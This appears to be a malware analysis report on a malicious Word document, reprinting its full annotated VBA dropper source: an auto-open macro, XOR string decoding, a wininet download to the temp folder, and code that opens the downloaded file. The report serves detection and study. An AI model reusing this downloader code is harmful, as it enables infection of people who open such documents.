Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7ac6d989c14097f9…

MALICIOUS

Office (OLE)

55.0 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05
MD5: be545eab87f1196e803512f07804ae32 SHA-1: f68ebb200512ad117548961296aeb08012b9bc66 SHA-256: 7ac6d989c14097f9edc5d8f46e0db43b24bacf91a6d24cbbd61832c0cbba3be8
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros, including an AutoOpen macro and a CreateObject call. The presence of these elements strongly suggests the document is designed to execute malicious code upon opening. The ClamAV detection 'Doc.Dropper.Agent-1822060' further supports this, indicating dropper functionality. The extracted macro source (below) bears this out: Module6 imports wininet's InternetOpenUrlA/InternetReadFile under obfuscated names, Module3 writes the downloaded response to a file, and HLOPHLOP32 builds that file path under a special folder, decodes its strings with an XOR routine, and opens the dropped file through a COM object created from a decoded ProgID.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-1822060 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1822060
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set X111 = CreateObject _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI that Office itself embeds; it is not a network indicator on its own. The addresses the macro actually contacts are stored XOR-encoded in Module5 and only decoded at runtime.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6714 bytes
SHA-256: 70ef0f5d2451e54afeb3d9a914209e3823072a970d09de3f41ca437709720438
Preview script
First 1,000 lines of the extracted script
' --- ThisDocument module stream (olevba output; the Attribute lines are module
' header metadata written by the VBA editor, not executable statements) ---
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point. Word runs autoopen() automatically when the document is opened
' (this is the line the OLE_VBA_AUTOOPEN heuristic matched). It does nothing
' itself except hand off to HLOPHLOP32 in Module5, which holds the payload logic.
Sub autoopen()
HLOPHLOP32
End Sub

Attribute VB_Name = "Module4"
' (empty module - no code was recovered for it)


Attribute VB_Name = "Module11"
' (empty module - no code was recovered for it)

Attribute VB_Name = "Module1"
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)
' Analyst note: the module below is an Excel worksheet helper carrying a
' public-domain attribution, embedded in a Word document. Nothing in the
' autoopen -> HLOPHLOP32 chain calls it, so it looks like filler rather than
' payload. Its "Last update" date also postdates the document's Created
' timestamp in the report header (2015-01-19), so one of the two is unreliable.

' Replaces any worksheet named sheet_name with a fresh one placed after the
' active sheet. Worksheets/Sheets/ActiveSheet are Excel globals, not Word ones,
' so this routine presumably could not run inside this document even if it were
' called - and it is not called anywhere in the recovered source.
Sub AddNewSheet(sheet_name)

' [original comment garbled by encoding] delete an existing sheet of that name,
' suppressing Excel's confirmation prompt around the delete
For Each ws In Worksheets
  If ws.Name = sheet_name Then
    Application.DisplayAlerts = False
    ws.Delete
    Application.DisplayAlerts = True
  End If
Next ws

' [original comment garbled by encoding] add the new sheet after the active one
Sheets.Add(After:=ActiveSheet).Name = sheet_name

End Sub

' "UFO": the two-GUID VB_Base plus VB_PredeclaredId = True is the header shape
' olevba emits for a UserForm; no code was recovered for it.
Attribute VB_Name = "UFO"
Attribute VB_Base = "0{76386A8F-C9E8-48DE-9528-E9D985F200EC}{08F64BDA-E7F3-4AB3-8C69-EABBF9CFCD70}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' "Class1": single-GUID VB_Base and VB_PredeclaredId = False, i.e. a class
' module; likewise empty in the recovered source.
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module3"
Option Explicit


' Constants for the wininet download routine API22222 below. The names are
' obfuscated ("API" + repeated digits); the meanings follow from how each one
' is used in that routine.
Private Const API333333 = 8162                  ' read-buffer size: bytes requested per InternetReadFile call
Private Const API33333 As String = "API33333"   ' User-Agent passed to InternetOpenA - a fixed, unusual UA string is a network detection hook
Private Const API3333 = 1                       ' InternetOpenA access type; 1 = INTERNET_OPEN_TYPE_DIRECT (no proxy)
Private Const API333 = &H4000000                ' InternetOpenUrlA flags; &H4000000 = INTERNET_FLAG_NO_CACHE_WRITE
' Downloads sURL over wininet and writes the response body to sFileName.
' Returns True only when at least one byte was received (dData <> 0); otherwise
' the Boolean default False (InternetOpenA failed, the URL request failed, or
' the response was empty).
' The obfuscated callees resolve to the Declares in Module6:
'   API22222222 = InternetOpenA,     API222222   = InternetOpenUrlA,
'   API2222222  = InternetReadFile,  API222222222 = InternetCloseHandle.
' Analyst note: the observable behaviour is an Office process loading
' wininet.dll, fetching a URL with the fixed User-Agent API33333, and then
' writing a file with Open/Put; the destination path is supplied by the caller
' (HLOPHLOP32 builds it under a special folder).
Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim API2222 As LongPtr, API3333333 As LongPtr
    #Else
        Dim API2222 As Long, API3333333 As Long
    #End If
    Dim API2 As Long                                          ' bytes returned by the last InternetReadFile call
    Dim API222 As String * API333333, API33333333 As String   ' fixed-length read buffer; accumulated response body
    Dim API22 As Integer, dData As Double                     ' file number; total length, doubling as the success flag
    ' Session handle: InternetOpenA(user-agent, INTERNET_OPEN_TYPE_DIRECT, no proxy, no bypass list, flags 0)
    API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
    If API2222 = 0 Then
        Exit Function
    End If
    ' Request handle for the URL with INTERNET_FLAG_NO_CACHE_WRITE; 0 means the request failed
    API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
    If API3333333 = 0 Then
        dData = 0
    Else
        ' The first read copies the whole fixed-length buffer regardless of
        ' API2; subsequent reads append only the API2 bytes actually returned,
        ' until a zero-length read ends the loop.
        API2222222 API3333333, API222, API333333, API2
        API33333333 = API222
        Do While API2 <> 0
            API2222222 API3333333, API222, API333333, API2
            API33333333 = API33333333 + Mid(API222, 1, API2)
        Loop
        ' Write the accumulated body to disk as raw bytes (Binary mode, exclusive write lock)
        dData = Len(API33333333): API22 = FreeFile
        Open sFileName For Binary Access Write Lock Write As #API22
        Put #API22, , API33333333: Close #API22
    End If
    ' Close the request and session handles (see the ByRef note on the Module6 Declare)
    API222222222 API3333333
    API222222222 API2222
    API33333333 = ""
    If dData Then
        API22222 = True
    End If
End Function

Attribute VB_Name = "Module2"
' (empty module - no code was recovered for it)

Attribute VB_Name = "Module5"
' Obfuscated string table for HLOPHLOP32. Module5 has no Option Explicit.
' Each X1111111x constant is a hex string that STOP7777777777(X1111, <constant>)
' in Module6 unpacks byte-wise and XORs with the key X1111 at runtime. Decoding
' them is how an analyst recovers the ProgIDs, drop-file name and download URL;
' the plaintext values never appear in the document body, which is presumably
' why the URL extraction above found only an Office schema namespace.
Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"                          ' ProgID of the object whose .Open launches the dropped file
Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"                           ' suffix appended to the special-folder path to form the drop path
Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"    ' download URL handed to API22222
Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"          ' ProgID of the object exposing GetSpecialFolder/FileExists/DeleteFile
Private Const X1111 = "MMMMMMMMMMMMM32"                                                 ' XOR key






' Main payload routine, reached from ThisDocument.autoopen. Every string it
' uses is decoded from the Module5 constants with the XOR key X1111. Sequence:
'   1. create an object from ProgID X11111 (the later GetSpecialFolder /
'      FileExists / DeleteFile calls point to a FileSystemObject - not proven
'      here without decoding the constant);
'   2. take special folder 2 (FSO's TemporaryFolder) and append the decoded
'      X1111111 to form the drop path X1;
'   3. delete any existing file at X1, then download the decoded X111111 to
'      X1 via API22222 (wininet, Module3);
'   4. create an object from ProgID X11111111 and call .Open on X1.
' The For loops that run 0 To 0 and would only `End` on an impossible index,
' the loop that exits on its first pass, the empty If blocks and
' `Set SSSS = Nothing` have no effect; they appear to be junk statements
' padding the routine. Module5 has no Option Explicit, so X1, SSSS and SASASA
' are implicitly declared Variants.
Sub HLOPHLOP32()
'* NAPIDPAOJMXNH55
' Loop exits on its first pass (3 <> 14), so this is a no-op
Dim T111111111111111 _
As Long
For T111111111111111 = _
3 To 10
If Not T111111111111111 = 14 _
Then Exit For
Next T111111111111111
' Step 1: object from decoded ProgID X11111
Dim X111
Set X111 = CreateObject _
(STOP7777777777 _
(X1111, X11111))
Dim X11
' 2 is the FileSystemObject TemporaryFolder special-folder constant
Const X11ID = 2
' Junk loop: runs once with index 0, never hits 5, so `End` never executes
Dim T11111111111111 As Integer
For T11111111111111 = 0 To 0
If T11111111111111 = 5 Then End
Next T11111111111111
' Step 2: special folder path
Set X11 = X111.GetSpecialFolder _
(X11ID)
' Junk loop (same pattern)
Dim T1111111111111 As Integer
For T1111111111111 = 0 To 0
If T1111111111111 = 5 Then End
Next T1111111111111
' Drop path = special folder & decoded X1111111 (X1 is an undeclared Variant)
X1 = X11 & STOP7777777777 _
(X1111, X1111111)
' Junk loop (same pattern)
Dim T111111111111 As Integer
For T111111111111 = 0 To 0
If T111111111111 = 5 Then End
Next T111111111111
' Re-creates the same object as step 1 - redundant
Set X111 = CreateObject _
(STOP7777777777 _
(X1111, X11111))
' Junk loop (same pattern)
Dim T11111111111 As Integer
For T11111111111 = 0 To 0
If T11111111111 = 5 Then End
Next T11111111111
' Step 3a: remove any previous drop at X1
If X111.FileExists _
(X1) Then
X111. _
DeleteFile X1
End If
' Step 3b: download decoded X111111 to X1. The Boolean result is discarded
' (empty If), so execution continues even when the download failed.
If API22222(STOP7777777777 _
(X1111, X111111), X1) Then
End If
' No-op: SSSS is never assigned anything else
Set SSSS = Nothing
' No-op: FileExists result is discarded
If X111. _
FileExists _
(X1) Then
End If
' Step 4: object from decoded ProgID X11111111, then .Open on the drop path -
' this is the execution step of the dropper
Set SASASA = CreateObject _
(STOP7777777777 _
(X1111, X11111111))
SASASA.Open X1
End Sub







Attribute VB_Name = "Module6"
Option Explicit

' wininet.dll imports under obfuscated names; the Alias clause carries the real
' export. Both branches declare the same four functions, the VBA7/Win64 branch
' with PtrSafe and LongPtr handles. An Office macro importing wininet by
' Declare is itself a useful static detection signal.
' Note InternetCloseHandle is declared ByRef: the caller in Module3 passes a
' handle variable, so the API presumably receives the variable's address rather
' than the handle value and the close would fail - harmless to the dropper's
' purpose, but worth knowing when reading sandbox API traces.
#If VBA7 And Win64 Then
Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If


' String decoder used by HLOPHLOP32. STOP777777777 is the XOR key and
' STOP77777777 a hex string; each two-digit hex byte of the latter is XOR'd with
' one key character and appended to the result. The key index is
' (i Mod Len(key)) + 1, so position 1 uses the second key character and the
' first key character is reached only when i is a multiple of the key length.
' With the Module5 key "MMMMMMMMMMMMM32" almost every byte is therefore XOR'd
' with &H4D ("M"), i.e. the encoded constants are close to single-byte XOR -
' straightforward to recover during analysis, and this decode loop is a
' candidate static signature for the family's string obfuscation.
Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
    Dim asasas1 As Long         ' 1-based index of the current hex pair
    Dim asasas1O As String      ' accumulated plaintext
    Dim asasas10 As Integer     ' current encoded byte
    Dim asasas101 As Integer    ' key byte selected for this position
    For asasas1 = 1 To (Len(STOP77777777) / 2)
        asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
    Next asasas1
   STOP7777777777 = asasas1O
End Function